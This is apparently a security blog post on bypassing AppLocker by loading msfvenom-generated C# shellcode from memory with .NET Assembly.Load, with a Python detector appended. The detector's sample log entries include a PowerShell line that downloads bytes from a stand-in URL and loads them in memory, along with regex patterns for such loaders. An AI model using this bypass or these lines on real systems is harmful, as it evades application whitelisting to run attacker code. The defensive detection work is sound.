It is possible, in an environment where AppLocker is enabled, to run an executable because of the way assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and was presented at ShmooCon 2015. The Assembly.Load method is able to load an assembly from three different locations:

- Memory (a Byte[] array)
- A location on disk
- A URL

The .NET assembly is initially loaded with Read permissions in order to enumerate the methods and properties of the binary; the permissions are then changed to Execute, so AppLocker or any other application whitelisting product cannot identify that something was executed on the system.

Bypassing AppLocker with this method consists of three steps:

1. Generate C# shellcode
2. Compile the .NET application
3. Execute the shellcode from memory with Assembly.Load

Metasploit's msfvenom can be used to generate C# shellcode:

[Figure: C# Shellcode Generation]

The shellcode above can be placed into a C# file, which can then be compiled with the csc utility (part of the .NET Framework) to produce the executable.

Running the executable directly or from PowerShell will fail, since this binary is not whitelisted by an AppLocker rule.

[Figure: AppLocker Rule – Block Executables]

[Figure: AppLocker Rule – Block ShellCode Binary]

However, it is possible to bypass this restriction by using the assembly loading method from PowerShell to execute the shellcode that is inside the file (defined as a method) directly from memory.
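Because the loader runs from PowerShell, the defender's visibility comes from PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the script text even when the assembly itself never touches disk as a whitelisted file. The following is an added detection example, not code from the original post: it scans constructed sample script block entries (the log lines, file names and URL are made up) for an Assembly.Load call that is fed a byte array from disk or from the network, which is the pattern this page describes, while leaving a by-name load of a framework assembly alone.

```python
import re

# Constructed sample script block log entries (Event ID 4104 style), embedded
# inline so the example runs offline. File names and the URL are made up.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: bytes read from disk, loaded in memory, then invoked via reflection
    "$bytes = [System.IO.File]::ReadAllBytes('C:\\Users\\Public\\app.exe'); "
    "$asm = [System.Reflection.Assembly]::Load($bytes); "
    "$asm.GetType('Program').GetMethod('Main').Invoke($null, $null)",
    # 1: bytes downloaded from a URL and loaded in memory
    "$wc = New-Object Net.WebClient; "
    "[Reflection.Assembly]::Load($wc.DownloadData('http://example.invalid/a.exe'))",
    # 2: benign: loading a framework assembly by name, which AppLocker can see
    "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null",
    # 3: benign administrative script with no assembly loading at all
    "Get-ChildItem C:\\Windows\\Temp | Remove-Item -Force",
]

# Assembly.Load( ... ) with an argument, as opposed to LoadWithPartialName / LoadFrom
LOAD_PATTERN = re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE)
# Sources that yield a byte[] rather than a named assembly on disk
BYTE_SOURCE_PATTERNS = {
    "disk_bytes": re.compile(r"ReadAllBytes\s*\(", re.IGNORECASE),
    "network_bytes": re.compile(r"DownloadData\s*\(", re.IGNORECASE),
    "byte_array_literal": re.compile(r"\[byte\[\]\]", re.IGNORECASE),
}
INVOKE_PATTERN = re.compile(r"\.Invoke\s*\(|\.EntryPoint\b", re.IGNORECASE)


def classify_script_block(block: str) -> dict:
    """Return which indicators fire for one script block plus a verdict."""
    hits = {"assembly_load": bool(LOAD_PATTERN.search(block))}
    for name, pattern in BYTE_SOURCE_PATTERNS.items():
        hits[name] = bool(pattern.search(block))
    hits["reflective_invoke"] = bool(INVOKE_PATTERN.search(block))
    # Alert only on Load(...) combined with a byte[] source; a by-name load of a
    # framework assembly does not match LOAD_PATTERN because "Load(" is required.
    byte_source = any(hits[name] for name in BYTE_SOURCE_PATTERNS)
    hits["verdict"] = "alert" if hits["assembly_load"] and byte_source else "benign"
    return hits


def scan_script_blocks(blocks):
    """Return the indices of script blocks that look like an in-memory Assembly.Load."""
    return [i for i, b in enumerate(blocks) if classify_script_block(b)["verdict"] == "alert"]


if __name__ == "__main__":
    for i in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {i}: {classify_script_block(SAMPLE_SCRIPT_BLOCKS[i])}")
```

The byte-source check is what separates this loader from ordinary Assembly.Load usage, so tuning it against your own baseline of 4104 events matters more than the Load match itself.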